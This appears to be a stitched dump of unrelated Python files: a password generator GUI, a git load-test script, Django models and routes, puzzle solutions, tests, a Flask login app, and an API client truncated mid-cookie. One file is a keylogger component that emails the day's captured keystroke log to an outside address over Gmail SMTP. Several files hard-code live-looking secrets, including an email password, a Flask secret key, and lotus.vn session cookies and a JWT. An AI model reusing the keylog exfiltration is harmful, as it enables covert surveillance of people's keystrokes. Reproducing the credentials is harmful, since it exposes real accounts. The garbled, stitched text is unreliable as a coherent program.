        pw += random.choice(charclass[c])
    password_e.delete(0, END)
    password_e.insert(0, pw)
# Checkbox state holders (1 = that character class is allowed in passwords).
allow_uppercase = IntVar()
allow_lowercase = IntVar()
allow_numbers = IntVar()
allow_special = IntVar()
uppercase_chk = Checkbutton(root, text="Uppercase letters (A-Z)", variable=allow_uppercase,onvalue=1)
lowercase_chk = Checkbutton(root, text="Lowercase letters (a-z)", variable=allow_lowercase,onvalue=1)
numbers_chk = Checkbutton(root, text="Numbers (0-9)", variable=allow_numbers,onvalue=1)
special_chk = Checkbutton(root, text="Special characters (!$%@#)", variable=allow_special,onvalue=1)
uppercase_chk.grid(row=4, column=1, sticky=W)
lowercase_chk.grid(row=5, column=1, sticky=W)
numbers_chk.grid(row=6, column=1, sticky=W)
special_chk.grid(row=7, column=1, sticky=W)
# NOTE(review): Button(...).grid(...) returns None, so these three names are
# all None -- harmless here since they are never used again.
create_btn = Button(root, text="Create",command=create).grid(row=9, column=1,pady=25,padx=20)
generate_btn = Button(root, text="Generate Password",command=gen).grid(row=8, column=1,pady=10)
back_btn = Button(root, text="Back",command=root.destroy).grid(row=8, column=0)
root.mainloop()
#!/usr/bin/python -u
""" git threading hammer test """
import os
from multiprocessing import Pool, log_to_stderr
import logging
import tempfile
from shutil import rmtree
import subprocess
from time import sleep
from random import random
import itertools
import traceback
import sys
import logging
try:
from tendo import colorer
except:
pass
# Multiprocessing-aware logger writing to stderr; warnings and above only.
LOGGER = log_to_stderr()
LOGGER.setLevel(logging.WARN)
logging.basicConfig(level=logging.INFO)
# --- CONFIG START ---
REPO_SSH = "ssh://git@gitlab.citrite.net/craigem/testing.git"
REPO_HTTP = "http://gitlab.citrite.net/craigem/testing.git"
PROCS = 10
# --- CONFIG END ---
REPOS = [REPO_HTTP]   # repos hammered by the read-only clone pool
SSH_ERROR_CODE = 128  # git exit status seen when the ssh transport fails
SSH_ERROR = "ssh_exchange_identification: Connection closed by remote host"
def ssh_safe_clone(repo, dname):
    """Clone `repo` into `dname`, retrying (up to 100 attempts) on the
    transient ssh_exchange_identification error.

    Returns (returncode, combined stdout+stderr output).
    """
    attempts = 0
    while True:
        proc = subprocess.Popen(["git", "clone", repo, dname],
                                stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT,
                                stdin=open(os.devnull))
        out = proc.communicate()[0]
        attempts += 1
        retryable = (proc.returncode == SSH_ERROR_CODE and SSH_ERROR in out
                     and attempts < 100)
        if not retryable:
            return (proc.returncode, out)
        sleep(0.5)
def clone(repo, remove=True):
    """Clone `repo` into a fresh temp dir under <tmpdir>/loadtest after a
    random 0-3s delay; optionally remove the checkout afterwards.

    Returns (returncode, output, dirname).
    """
    dname = tempfile.mkdtemp(dir=os.path.join(tempfile.gettempdir(), 'loadtest'))
    # Jitter so the worker processes do not hit the server in lockstep.
    sleep(3.0 * random())
    (ret, out) = ssh_safe_clone(repo, dname)
    present = os.path.isdir(dname)
    if remove and present:
        rmtree(dname)
    return (ret, out, dname)
def clone_and_push_in_loop(repo):
    """Clone `repo` once, then loop forever: append a line to sample.txt,
    commit, and push. Any failure is logged and terminates the worker."""
    try:
        (ret, out, dpath) = clone(repo, remove=False)
        logging.info("Starting writable repo %s in %s ..." % (repo, dpath))
        if ret != 0:
            raise Exception("Fatal error on writable thread %s => %s: %s" % (repo, dpath, out))
        while True:
            # BUG FIX: `f.close` (no parentheses) never closed the handle;
            # use a context manager instead.
            with open(os.path.join(dpath, 'sample.txt'), "a") as f:
                f.write("bla bla made from %s \n" % dpath)
            sleep(1)
            # BUG FIX: shell=True combined with an argument *list* makes the
            # shell run just "git" and silently drop the remaining arguments;
            # run the command directly.
            proc = subprocess.Popen(["git", "commit", "-v", "-a", "-m", "somechange"],
                                    stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                    stdin=open(os.devnull), cwd=dpath)
            (out, outerr) = proc.communicate()
            ret = proc.returncode
            logging.info("Commit: %s : %s : %s" % (ret, out, outerr))
            if ret:
                raise Exception("commit failed!: %s" % out)
            proc = subprocess.Popen(["git", "push"],
                                    stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                    stdin=open(os.devnull), cwd=dpath)
            (out, outerr) = proc.communicate()
            ret = proc.returncode
            logging.info("Push: %s : %s : %s" % (ret, out, outerr))
            if ret:
                raise Exception("push failed: %s" % out)
            sleep(2)
        # Unreachable: the loop above only exits via an exception.
        logging.info("Before cleanup...")
        rmtree(dpath)
        logging.info("Writable loop ended normally?")
    except Exception as e:
        logging.error("Failed with %s" % e)
def main():
""" main """
logging.info("Starting writing thread...")
testdir = os.path.join(tempfile.gettempdir(),'loadtest')
wp = Pool(1)
result = wp.map_async(clone_and_push_in_loop, [REPO_SSH] * 1)
sleep(5)
logging.info("Starting the load test on %s threads..." % PROCS)
try:
os.mkdir(testdir)
except:
pass
try:
for repo in REPOS:
p = Pool(PROCS)
result = p.map_async(clone, [repo] * PROCS)
failed = len(list(itertools.ifilter(lambda r: r[0] != 0, result.get(999999)))) # see http://stackoverflow.com/a/1408476/99834
print "%s / %s failed" % (failed, PROCS)
p.close()
p.join()
except Exception as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback,
limit=2, file=sys.stdout)
#traceback.print_tb(e)
#logging.error(e)
print e
try:
os.removedirs(testdir)
except:
pass
wp.close
wp.join
if __name__ == "__main__":
main()
|
from . import views
from django.urls import path
app_name="Myapp"
urlpatterns = [
path('', views.index, name="index"),
path('learn', views.learn ,name="learn"),
path('codeform', views.codeform, name="codeform"),
path('pro', views.pro ,name="pro"),
path('compare', views.compare,name="compare"),
] |
""" This program solves ProjectEuler problem 44, which asks the following:
If pentagonal numbers are of the form n(3n-1)/2, find the difference D
between the pair of numbers P1 and P2 that minimize D and satisfies:
P1 and P2 are pentagonal, and so is their sum and their difference.
My first program was too slow, but found a pair satisfying the condition which had
a difference of just under 6,000,000 (but couldn't say it was the smallest).
This improved program uses the fact that the answer cannot be > 6 million.
The algorithm starts out by computing a list of pentagonals that is sufficiently
long, as well as a set of pentagonals which can be used to check if a number is
pentagonal, and which goes high enough to contain sums of pentagonals.
After this, the list of pentagonals is searched for pairs satisfying
the criteria, only checking pairs with difference < 6 million.
After all pairs are checked, the lowest difference is reported.
runs in ~10 seconds on my computer"""
pentagonals = [1,5,12]   # ordered list of pentagonal numbers P(n)
pentset = {1,5,12}       # membership set, extended beyond the list so sums can be tested
answer = 0               # smallest qualifying difference found so far (0 = none yet)
i=4                      # next index for the pentagonal list
y=4                      # next index for the pentagonal set
last = 12                # largest pentagonal currently in the set
Upper_bound = 6000000    # proven upper bound on the answer (see module docstring)
while (True): # This first loop generates the list and set of pentagonals
    pentagonals.append(int(i*(3*i-1)/2))
    # Grow the membership set until it covers the largest sum we may test.
    while last <= (pentagonals[-2]+pentagonals[-1]):
        last = int(y*(3*y-1)/2)
        pentset.add(last)
        y+=1
    # Once consecutive pentagonals differ by more than the bound, no later
    # pair can have a smaller difference, so the list is long enough.
    if pentagonals[-1]-pentagonals[-2] > Upper_bound:
        break
    i+=1
for j in range(len(pentagonals)-1): # This loop checks all pairs with difference <6,000,000 and saves candidate answers
    k=j+1
    while(pentagonals[k]-pentagonals[j]< Upper_bound):
        # Keep the pair if both the difference and the sum are pentagonal and
        # the difference beats the best answer so far.
        if int(pentagonals[k]-pentagonals[j]) in pentset and int(pentagonals[k]+pentagonals[j]) in pentset and (answer==0 or (pentagonals[k]-pentagonals[j])<answer):
            answer = int(pentagonals[k]-pentagonals[j])
        if k ==len(pentagonals)-1:
            break
        k+=1
print(answer)
|
### import
import datetime
import pytest
from quizzer.models.quiz import Quiz, QuizQuestion, QuizQuestionChoice
### test Quiz
def test_good_quiz(class_, teacher):
    """A fully-specified quiz constructs cleanly and auto-stamps `created` (UTC)."""
    choices = [
        QuizQuestionChoice(text=u'Document-oriented', is_correct=True),
        QuizQuestionChoice(text=u'Relational'),
        QuizQuestionChoice(text=u'Any other, fast and simple enough', is_correct=True),
        QuizQuestionChoice(text=u'Whatever'),
    ]
    question = QuizQuestion(
        text=u'What design fits better for Quiz.questions?',
        choices=choices,
    )
    quiz = Quiz(
        name=u'Object-oriented data structure design',
        class_=class_,
        percentage=100,
        owner=teacher,
        questions=[question],
    )
    assert hasattr(quiz, 'created')
    assert isinstance(quiz.created, datetime.datetime)
    assert 0 <= (datetime.datetime.utcnow() - quiz.created).total_seconds() < 1
# Skipping other tests of abstract base Model here, see Teacher tests.
### also test custom validation feature of abstract base Model
def test_bad_quiz_question_type(class_, teacher):
    """Passing a non-QuizQuestion in `questions` must raise TypeError."""
    with pytest.raises(TypeError) as e:
        quiz = Quiz(
            name=u'Object-oriented data structure design',
            class_=class_,
            owner=teacher,
            questions=[True],
        )
    # NOTE(review): relies on str(e) (the ExceptionInfo) containing the message;
    # newer pytest prefers str(e.value) -- confirm against the pinned pytest.
    assert '''"Quiz" requires type of field "questions[0]" to be <class 'quizzer.models.quiz.QuizQuestion'>, not <type 'bool'>''' in str(e)
def test_bad_quiz_question_choice_type(class_, teacher):
    """Passing a non-QuizQuestionChoice in `choices` must raise TypeError."""
    with pytest.raises(TypeError) as e:
        quiz = Quiz(
            name=u'Object-oriented data structure design',
            class_=class_,
            owner=teacher,
            questions=[
                QuizQuestion(
                    text=u'What design fits better for Quiz.questions?',
                    choices=[True],
                ),
            ],
        )
    # NOTE(review): same str(e) vs str(e.value) caveat as the test above.
    assert '''"QuizQuestion" requires type of field "choices[0]" to be <class 'quizzer.models.quiz.QuizQuestionChoice'>, not <type 'bool'>''' in str(e)
|
import schedule
import time
def job():
    """Email today's keylog file to the first address stored in the Email DB.

    Reads the recipient list from the local sqlite 'Email' database, loads the
    log file named after today's date, sends it via Gmail SMTP-over-SSL, then
    sleeps 300 seconds.
    """
    import sqlite3
    import smtplib
    # BUG FIX: the DB connection, log file, and SMTP session were never closed
    # on error; use try/finally and a context manager.
    con2 = sqlite3.Connection('Email')
    try:
        cur2 = con2.cursor()
        cur2.execute('select * from email')
        recipient_email = cur2.fetchall()
    finally:
        con2.close()
    # SECURITY: credentials are hard-coded in source -- move them to a config
    # file or environment variable before sharing this script.
    sender_email = 'divyanshsengarjuet@gmail.com'
    password = '26060000'
    date = time.localtime().tm_mday, time.localtime().tm_mon, time.localtime().tm_year
    today = str(date[0]) + '-' + str(date[1]) + '-' + str(date[2])
    with open('C:/Users/divyansh/Desktop/Keylogger/LOG FILES/' + today + '.txt', 'r') as f:
        text = 'Keylog file\n' + f.read()
    server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
    try:
        server.login(sender_email, password)
        # Only the first stored address is used.
        server.sendmail(sender_email, recipient_email[0][0], text)
    finally:
        server.quit()
    time.sleep(300)
# Fire one send immediately (blocks ~300s inside job()); the commented block
# below shows the abandoned schedule-based daily run.
job()
##try:
##    job()
##except FileNotFoundError:
##    schedule.every().day.at('00:00:10').do(job)
##while 1:
##    schedule.run_pending()
##    time.sleep(1)
|
from flask import Flask, render_template, request, session
from flask import redirect, url_for
import utils
app = Flask(__name__)
@app.route("/")
@app.route("/home")
def home():
return render_template('home.html')
@app.route("/login", methods = ["GET", "POST"])
def login():
if "logged" not in session:
session["logged"] = False
if request.method=="GET":
return render_template("login.html")
else:
uname = request.form['username']
pword = request.form['password']
button = request.form['button']
if button=="cancel":
return render_template("login.html")
if utils.authenticate(uname,pword):
session["logged"] = True
return redirect(url_for("success"))
else:
error = 'INVALID IDENTIFICATION, ABORT SITE!!!'
return render_template("login.html",err=error)
@app.route("/success")
def success():
if "logged" not in session:
session["logged"] = False
if not session["logged"]:
return redirect(url_for("login"))
else:
return render_template("success.html")
@app.route("/logout")
def logout():
session["logged"] = False
return redirect(url_for("login"))
if __name__ == "__main__":
app.debug = True
app.secret_key = "get herbed"
app.run(host='0.0.0.0',port=8000)
|
from src.domain.environments.real_world_environment import RealWorldEnvironment
from src.domain.environments.vision_environment import VisionEnvironment
from src.domain.objects.target_zone import TargetZone
from src.vision.coordinate_converter import CoordinateConverter
class RealWorldEnvironmentFactory(object):
    """Builds a RealWorldEnvironment by projecting vision-space detections
    (pixels) into real-world coordinates."""

    # Value passed to TargetZone; 66.2 was previously hard-coded inline.
    # NOTE(review): unit/meaning of this figure is not visible here -- confirm
    # against the TargetZone definition.
    DEFAULT_TARGET_ZONE_SIZE = 66.2

    def __init__(self, coordinate_converter: CoordinateConverter):
        self.coordinate_converter = coordinate_converter

    def create_real_world_environment(self, vision_environment: VisionEnvironment,
                                      target_zone_size: float = DEFAULT_TARGET_ZONE_SIZE) -> RealWorldEnvironment:
        """Project obstacles and cubes to real-world space and attach a target zone.

        `target_zone_size` keeps its historical default (66.2), so existing
        callers are unaffected; it is now overridable for other table setups.
        """
        obstacles = self.coordinate_converter.project_obstacles_from_pixel_to_real_world(vision_environment.obstacles)
        cubes = self.coordinate_converter.convert_vision_cubes_to_real_world_environment_cubes(vision_environment.cubes)
        return RealWorldEnvironment(obstacles, cubes, TargetZone(target_zone_size))
|
import time
class ProfileStats:
    """Process-wide collector of ProfileTime measurements, grouped by id."""

    _instance = None

    @staticmethod
    def instance():
        """Lazily create and return the singleton collector."""
        if ProfileStats._instance is None:
            ProfileStats._instance = ProfileStats()
        return ProfileStats._instance

    @staticmethod
    def add(profile_time):
        """Record a finished ProfileTime on the singleton."""
        ProfileStats.instance()._add(profile_time)

    @staticmethod
    def print_stats():
        """Dump the mean and raw timings for every recorded id."""
        ProfileStats.instance()._print_stats()

    def __init__(self):
        # id -> list of ProfileTime objects recorded under that id
        self.profilers = {}

    def _add(self, profile_time):
        self.profilers.setdefault(profile_time.id, []).append(profile_time)

    def _print_stats(self):
        if not self.profilers:
            return
        print(f'{"-"*7} PROFILER {"-"*7}')
        for key, timings in self.profilers.items():
            results = [p.result for p in timings]
            mean = sum(results) / len(results)
            print(f'[{key}] middle: {round(mean, 3)} {str(results)}')
        print(f'|{"_"*10}profiler{"_"*10}|')
class ProfileTime(object):
    """Stopwatch for one measurement; report via stop() or use as a context manager."""

    def __init__(self, id, msg=None):
        self.msg = msg
        self.id = id
        self.__start = time.time()
        self.result = -1  # -1 until stop() records the elapsed seconds

    def stop(self):
        """Record elapsed seconds (3 dp) and register with ProfileStats."""
        self.result = round(time.time() - self.__start, 3)
        ProfileStats.add(self)

    def __enter__(self):
        # BUG FIX: previously returned None, so `with ProfileTime(...) as p:`
        # bound p to None; return the instance instead.
        return self

    def __exit__(self, *_):
        self.stop()
from django.db import models
from django.contrib.auth.models import User
from django.core.validators import MinValueValidator
class Car(models.Model):
    """A user's car; `consumption` is stored in liters per 100 km."""
    owner = models.ForeignKey(User, on_delete=models.CASCADE, related_name='cars',)
    brand = models.CharField(max_length=100)
    model = models.CharField(max_length=100)
    register_plate = models.CharField(max_length=100)
    consumption = models.DecimalField(max_digits=4, decimal_places=2, null=True, validators=[MinValueValidator(0.01)]) #liters per 100 km
    def __str__(self):
        # e.g. "User: 3 car ABC-123"
        return "User: " + str(self.owner.id) + " car " + self.register_plate
#!/usr/bin/python
def nested(l):
    """Return the nesting depth of list `l` (an empty or flat list has depth 1).

    BUG FIX: the original overwrote `count` with the depth of the *last* list
    element, so a deep element followed by a shallow one under-reported the
    depth; take the maximum over all elements instead.
    """
    count = 1  # also covers the empty-list case (previous early return)
    for item in l:
        if type(item) is list:
            count = max(count, 1 + nested(item))
    return count
print(nested([])) |
# Generated by Django 3.0.3 on 2020-08-06 15:10
from django.db import migrations
class Migration(migrations.Migration):
    """Rename the plural model names (Agents/AgentShifts/Shifts) to singular."""
    dependencies = [
        ('weekly', '0001_initial'),
    ]
    operations = [
        migrations.RenameModel(
            old_name='Agents',
            new_name='Agent',
        ),
        migrations.RenameModel(
            old_name='AgentShifts',
            new_name='AgentShift',
        ),
        migrations.RenameModel(
            old_name='Shifts',
            new_name='Shift',
        ),
    ]
|
#I have tested this code on Windows and it works; please check it on other systems.
#
# Wherever you see C:\\Users\\Nathaniel\\Dropbox\\code, change it to the path of your Dropbox.
#
# That was the path for my Dropbox, therefore it may not work for you.
#
#I have a common place where I store all my projects locally; that location is E:\\code\\codes\\
#
#Please replace that location with the one on your computer.
#
#
#
#
#
#
#
#
import os
import shutil
print("import \nexport \nexit")
choice=input()
while(choice != "exit"):
if(choice == "import"):
os.system("cls")
dir_dst = "C:\\Users\\Nathaniel\\Dropbox\\code"
project_name = input("project name:- ")
if(project_name == "exit()"):
exit()
temp_dir_src = "E:\\code\\codes\\"
dir_src = temp_dir_src + project_name
dest_folder_name = "C:\\Users\\Nathaniel\\Dropbox\\code\\" + project_name
os.mkdir(dest_folder_name)
for file in os.listdir(dir_src):
print(file)# testing
src_file = os.path.join(dir_src, file)
dst_file = os.path.join(dir_dst, file)
shutil.move(src_file, dest_folder_name)
print("transfer complete")
print("import \nexport \nexit")
choice=input()
#
#dir_src = the initial places where the file is located along with the project name
#dir_dst = has the directory destination without the project name
#dest_folder_name = has te destanation path along with the project name
def trans(src_dir, dest_dir , dest_dir_pro):
src_dir = dir_src
dest_dir= dir_dst
dest_dir_pro = dest_folder_name
os.mkdir(dest_folder_name)
for file in os.listdir(dir_src):
print(file)# testing
src_file = os.path.join(dir_src, file)
dst_file = os.path.join(dir_dst, file)
shutil.move(src_file, dest_folder_name)
print("transfer complete")
#
#
#if(choice == "export"):
# os.system("cls")
# dir_dst = "C:\\Users\\Nathaniel\\Dropbox\\code"
# project_name = input("project name:- ")
# temp_dir_src = "E:\\code\\codes\\"
# dir_src = temp_dir_src + project_name
# dest_folder_name = "C:\\Users\\Nathaniel\\Dropbox\\code\\" + project_name
# os.mkdir(dest_folder_name)
# for file in os.listdir(dir_src):
# print(file)# testing
# src_file = os.path.join(dir_src, file)
# dst_file = os.path.join(dir_dst, file)
# shutil.move(src_file, dest_folder_name)
# print("transfer complete")
#
#
# os.system("cls")
# project_name = input("Project name:- ")
# temp_dir_dest = "E:\\code\\codes\\" + project_name
# os.mkdir(temp_dir_dest)
#
#
# src_folder_name = "C:\\Users\\Nathaniel\\Dropbox\\code\\" + project_name
# for file in os.listdir(dir_src):
# print(file)# testing
# src_file = os.path.join(dir_src, file)
# dst_file = os.path.join(dir_dst, file)
# shutil.move(src_file, dest_folder_name)
# print("transfer complete")
#
#if(choice == "export"):
# os.system("cls")
# project_name = input("project name:- ")
# dir_src = "C:\\Users\\Nathaniel\\Dropbox\\code"
# temp_dir_dst = "E:\\code\\codes\\"
# dir_dest = "E:\\code\\codes\\" + project_name
# os.mkdir(dir_dest)
#
#
# #dir_src = temp_dir_src + project_name
# #dest_folder_name = "C:\\Users\\Nathaniel\\Dropbox\\code\\" + project_name
# #os.mkdir(dir_dest)
# for file in os.listdir(dir_src):
# print(file)# testing
# src_file = os.path.join(dir_src, file)
# dst_file = os.path.join(dir_dst, file)
# shutil.move(src_file, dir_dest)
# print("transfer complete")
if(choice=="export"):
os.system("cls")
project_name = input("Project name:- ")
if(project_name == "exit()"):
exit()
dir_src = "C:\\Users\\Nathaniel\\Dropbox\\code\\" + project_name
dir_dst = "E:\\code\\codes\\"
dest_folder_name = "E:\\code\\codes\\" + project_name
#trans(src_dir,dest_dir,dest_dir_pro)
os.mkdir(dest_folder_name)
for file in os.listdir(dir_src):
print(file)# testing
src_file = os.path.join(dir_src, file)
dst_file = os.path.join(dir_dst, file)
shutil.move(src_file, dest_folder_name)
print("transfer complete")
print("import \nexport \nexit")
choice=input()
|
class Solution:
    """Longest palindromic substring -- two implementations (DP and Manacher-style)."""

    # dynamic programming
    def longestPalindrome0(self, s):
        """
        :type s: str
        :rtype: str
        """
        # store bool of i ,j as a palindrome from i to j.
        # cannot use i to indicate the center
        # there exists even cases
        dp = [[False,] * len(s) for i in range(len(s))]
        length = len(s)
        for i in range(length):
            dp[i][i] = True
        max = 0   # NOTE: shadows the builtin `max`; length of the best palindrome so far
        ret = s[0]
        # Iterate i from the end so dp[i+1][j-1] is already filled in.
        for i in range(length -1 , -1 , -1):
            for j in range(i, length):
                # print(i, j)
                # A span is a palindrome iff its ends match and the interior is
                # trivial (span length <= 3) or itself a palindrome.
                dp[i][j] = (j - i < 3 or dp[i+1][j-1]) and s[i] == s[j]
                # print("%d %d %s"%(i ,j ,str(dp[i][j])))
                if dp[i][j]:
                    if j - i + 1 > max:
                        ret = s[i:j+1]
                        max = j - i + 1
        print(ret)  # leftover debug output
        return ret

    # Manacher
    def longestPalindrome(self, s):
        """
        :type s: str
        :rtype: str
        """
        # make the string to odd length
        tmp = s
        s = "#" + "".join([c + "#" for c in s])
        # print(s)
        i = mx = 0   # mx: rightmost boundary reached by any palindrome so far
        mid = 0      # center of the palindrome that reaches mx
        max = 0      # NOTE: shadows the builtin; best half-length so far
        # length = [0,] * len(s)
        length = []  # length[k] = palindrome half-length centered at k
        for k in range(len(s)):
            import pdb   # leftover debug import -- unused unless set_trace() is re-enabled
            # pdb.set_trace()
            if k < mx:
                # Mirror k across mid and reuse the mirrored half-length,
                # capped by the distance to the right boundary.
                # NOTE(review): `mx - i` uses i, which is never updated from 0;
                # this looks like it was meant to be `mx - k` -- confirm.
                j = 2 * mid - k
                tmp_l = length[j]
                count = min(tmp_l, mx - i)
                left = k - tmp_l
                right = k + tmp_l
                for t in range(1, min(left + 1, len(s) - right)):
                    if s[right + t] == s[left - t]:
                        count += 1
                    else:
                        break
                length.append(count)
            else:
                # Plain center expansion.
                count = 0
                for t in range(1, min(len(s) - k, k + 1)):
                    if s[k + t] == s[k - t]:
                        count += 1
                    else:
                        break
                length.append(count)
            if length[k] > max:
                max = length[k]
                mx = k + length[k]
                mid = k
                ret = s[k - max:k + max + 1]
                # print(k)
                # print(length[k])
        print(ret)  # leftover debug output
        print(length)
        return ret.replace("#", "")
# Ad-hoc manual check (also triggers the debug prints above).
s = Solution()
print(s.longestPalindrome('babad'))
|
from flask import Blueprint, Flask,redirect, session, g, render_template, url_for,request, send_from_directory ,Response #imports
import requests
import os
import sys
from flask_celery import make_celery
from flask_pymongo import PyMongo
import random
from random import choice,randint
import time
import datetime
from multiprocessing.pool import ThreadPool
from pydrive.auth import GoogleAuth
from pydrive.drive import GoogleDrive
from pydrive.files import GoogleDriveFile
from os import path
from multiprocessing.pool import ThreadPool
import io
from apiclient import errors
from apiclient import http
import json
from bson.objectid import ObjectId
from requests_toolbelt import MultipartEncoder
import filetype
def getUserInfo():
header={"Cookie":"_kh_d_guid=892466748f4544f5e6fcfea6074bf76b; lotus=CfDJ8Dq0dlIYuJNOgmJyXTgyxclwVdrWqIfgqvG-42_w84Nyx-9cLLKI_hhdtkOkvBFOkoh-OkHTb8FTkV0715e4AYup0EIL_hITIwxDPfUyBLyp0kXKz_xQkhR1lZl3HrepLWPfrpR5zpWFz9nOAoaKxXCMbfSvAw3Z_o2USsXzNYQlcPIcJZc2XMNbyERY02yx2R7C4seYq0LKhvHLqiSLukZE7A3gNdVjXOnzXe-vzjdrdXQhMuXcgHDbZzKGG6ZHVXJF_W_5k-OVB3_qAXOkDRF6n2WgXljTMUILlbk23sD_BKGB9DKw4ViDnveHJzpcf3Y-BA-wp14hRdeOp8RFsUYmqJEaDCXgB9uibtKjLeHWhfyifJRASWkD18Yg0DkDiSDNl2KwWgxPlZgJHPcZsxGVBtCo_J5DKQcPME-3r3cX7v_nFTCmb5IQbZsjp5_fKCbyBTJtoVWtG33hMMGw8oozxByYGe9YkUIlWljKog6OHwApz6fCC0HiNeHBPiAK3NBK6c_Wu9DAbN3pct3MFcC7EkUetp3ZrGft7qOiX4mMytWofr7wI4T4IUIA9PNDMDGE6WCqWxYvCp1EpV0uvlf4SNGWMp29XW8aJ3bm3JMu1mxHy7CA6F5IkpKkxddCvoYu6VLb3dPfHNJmEIdzHQf7OqxRU1vciUzvvHUU4suncQPcoqomnZq9Zoswf54N-eMXIPi28M_4KRzX8bNcAjN-uihmPITW3oMkPr2AA3QVEUlK3LDS8SZfPwCvZmnlGyJKmqQXnExQ3YoDkdWHpmg5BoXuD1Pr5LZpBKM5ORbcoZI2KagZj2JYVDCWAJx-5xCBmg5qdQbKlgqdZPFx8VHeiV9q3nz_KhFHYgqiT8t93EaW4pPPnZonVeXqCapugWX_g_Km1nxrcJIVDqTVuQXyEXVriY2haIpwDszt1zA__xvXnw2mBzIiNszzblbaJy3bXzGSeTYUiV2MO5ExOf-xnZH1uxwr1OR7Ry4U0BZJz4tP9kVhaGQcR3suhzuekoxdfm3-sRcqiic_QUiHQvVFpzTNgvmEp-PnceN6301HQA7Eo4W8xMlTymUBsrZlBytJlIC_uXTWUq_ULEcNmMveWX30DWxyt0WuH3jDqm34py8AC7D5pK4Ih0URPa5nVxh1xW6UY16nOQ0aYCJPVvb-_9QK4TxoevPtMzSmxf1XL1BnD0aFQt8HzSyvp3frvojcySKC7hZfD6Pa7miV_V3Y6-TRM4wbYOV4UKHX39PVM2DmLuHv-zTHcMrQbAFW_xMMXRYyu4RM_QzjUXAZqhq5_G5TFbaYuIdYRIb3xu69EirqOqwnNATS_4w_tPZ9Hlf1yI_to1i4ZnjKvHmLtpcdXdshCRuh03qXfwwkYNsf_6j8G7i7b3DFaFGpHHpJ_9M5vmQ52PT-liztubVZa0bcR1NElfdnoZV3kTx8ocA8IXXXUwl35ztr_Ybo3e-mBf1LBZ3gh98zEad8M6lYxORNkJ8LQtAvHgV-xm-eWWtafpTWVtekRb42tRINnibbP_0gKeFJxe6hX2oh4Sqf9WISB67isnFWXULTwurC6YkcqkHXoh0n_F9GxujwUZ_CMDUIjWspozPS3uNdL-EL6YiF9p5P7QkvXVht0NbkzrXq; _lt_sd=PwdfIiFSBSsbFh4VKQk8UDlRRGtFKFElQD8FWRM/PBEYWxxzS0RXJlgECgtnbHATeBYTIgIUaTldUlFbcWJiBWQCX2JXVAZgDkFYQXN0fhMnURUiDglYOV1SUVsjMGICZgJTYgYHAGlfFAlMdW4zBTUDAjdRVwcxXEZcQHVmYgFkBVFjAgcGZQhHXB1nKw==; __admUTMtime=1598859448; 
_kh_t_e_a_s=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnYXRld2F5MSIsImF1ZCI6WyJ3ZWJraW5naHViIiwid2Via2luZ2h1YiJdLCJyb2xlIjoibWVtYmVyIiwiZXhwIjoxNTk4ODYwMDczLCJpYXQiOiIyMDIwLTA4LTMxIDE0OjM3In0.glZaFd_fcxlRQKPNt4EvewRhyfInMgHxYksy2BAtaGM"}
response = requests.post("https://lotus.vn/w/authenticate/getuserinfo",headers=header)
metadata = response.json()["data"]
#print(metadata)
return {"user_id":metadata["user_id"],"sessionid":metadata["sessionid"],"type":metadata["type"]}
def gtk():
header={"Cookie":"_kh_d_guid=892466748f4544f5e6fcfea6074bf76b; lotus=CfDJ8Dq0dlIYuJNOgmJyXTgyxclwVdrWqIfgqvG-42_w84Nyx-9cLLKI_hhdtkOkvBFOkoh-OkHTb8FTkV0715e4AYup0EIL_hITIwxDPfUyBLyp0kXKz_xQkhR1lZl3HrepLWPfrpR5zpWFz9nOAoaKxXCMbfSvAw3Z_o2USsXzNYQlcPIcJZc2XMNbyERY02yx2R7C4seYq0LKhvHLqiSLukZE7A3gNdVjXOnzXe-vzjdrdXQhMuXcgHDbZzKGG6ZHVXJF_W_5k-OVB3_qAXOkDRF6n2WgXljTMUILlbk23sD_BKGB9DKw4ViDnveHJzpcf3Y-BA-wp14hRdeOp8RFsUYmqJEaDCXgB9uibtKjLeHWhfyifJRASWkD18Yg0DkDiSDNl2KwWgxPlZgJHPcZsxGVBtCo_J5DKQcPME-3r3cX7v_nFTCmb5IQbZsjp5_fKCbyBTJtoVWtG33hMMGw8oozxByYGe9YkUIlWljKog6OHwApz6fCC0HiNeHBPiAK3NBK6c_Wu9DAbN3pct3MFcC7EkUetp3ZrGft7qOiX4mMytWofr7wI4T4IUIA9PNDMDGE6WCqWxYvCp1EpV0uvlf4SNGWMp29XW8aJ3bm3JMu1mxHy7CA6F5IkpKkxddCvoYu6VLb3dPfHNJmEIdzHQf7OqxRU1vciUzvvHUU4suncQPcoqomnZq9Zoswf54N-eMXIPi28M_4KRzX8bNcAjN-uihmPITW3oMkPr2AA3QVEUlK3LDS8SZfPwCvZmnlGyJKmqQXnExQ3YoDkdWHpmg5BoXuD1Pr5LZpBKM5ORbcoZI2KagZj2JYVDCWAJx-5xCBmg5qdQbKlgqdZPFx8VHeiV9q3nz_KhFHYgqiT8t93EaW4pPPnZonVeXqCapugWX_g_Km1nxrcJIVDqTVuQXyEXVriY2haIpwDszt1zA__xvXnw2mBzIiNszzblbaJy3bXzGSeTYUiV2MO5ExOf-xnZH1uxwr1OR7Ry4U0BZJz4tP9kVhaGQcR3suhzuekoxdfm3-sRcqiic_QUiHQvVFpzTNgvmEp-PnceN6301HQA7Eo4W8xMlTymUBsrZlBytJlIC_uXTWUq_ULEcNmMveWX30DWxyt0WuH3jDqm34py8AC7D5pK4Ih0URPa5nVxh1xW6UY16nOQ0aYCJPVvb-_9QK4TxoevPtMzSmxf1XL1BnD0aFQt8HzSyvp3frvojcySKC7hZfD6Pa7miV_V3Y6-TRM4wbYOV4UKHX39PVM2DmLuHv-zTHcMrQbAFW_xMMXRYyu4RM_QzjUXAZqhq5_G5TFbaYuIdYRIb3xu69EirqOqwnNATS_4w_tPZ9Hlf1yI_to1i4ZnjKvHmLtpcdXdshCRuh03qXfwwkYNsf_6j8G7i7b3DFaFGpHHpJ_9M5vmQ52PT-liztubVZa0bcR1NElfdnoZV3kTx8ocA8IXXXUwl35ztr_Ybo3e-mBf1LBZ3gh98zEad8M6lYxORNkJ8LQtAvHgV-xm-eWWtafpTWVtekRb42tRINnibbP_0gKeFJxe6hX2oh4Sqf9WISB67isnFWXULTwurC6YkcqkHXoh0n_F